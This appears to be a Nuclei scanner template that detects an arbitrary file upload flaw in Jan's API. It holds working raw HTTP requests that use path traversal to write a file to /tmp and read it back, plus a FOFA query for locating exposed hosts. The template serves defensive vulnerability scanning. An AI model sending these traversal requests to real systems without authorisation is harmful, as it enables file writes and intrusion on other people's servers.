nuclei-templates/http/vulnerabilities/other/jan-file-upload.yaml

51 lines
1.6 KiB
YAML

id: jan-file-upload
info:
name: Jan - Arbitrary File Upload
author: pussycat0x
severity: high
description: |
Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
reference:
- https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
- https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
metadata:
fofa-query: icon_hash="-165268926"
max-request: 2
tags: jan,intrusive,file-upload
variables:
string: "{{to_lower(rand_base(5))}}"
http:
- raw:
- |
POST /v1/app/writeFileSync HTTP/1.1
Host: {{Hostname}}
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Origin: {{RootURL}}
["/../../../../../tmp/{{string}}.txt","{{randstr}}"]
- |
POST /v1/app/readFileSync HTTP/1.1
Host: {{Hostname}}
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Origin: {{RootURL}}
["file:/../../../../../tmp/{{string}}.txt","utf-8"]
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{randstr}}'
- type: word
part: content_type_2
words:
- 'text/plain'
# digest: 4a0a00473045022100bab87139fb70667309d17f748b218ed04bd46430722ce1a85672fb48685efc1c0220027468b820d19a0c87d363387aecaaaf6a7448a21ca3584e58509cfbbe10f533:922c64590222798bb761d5b6d8e72950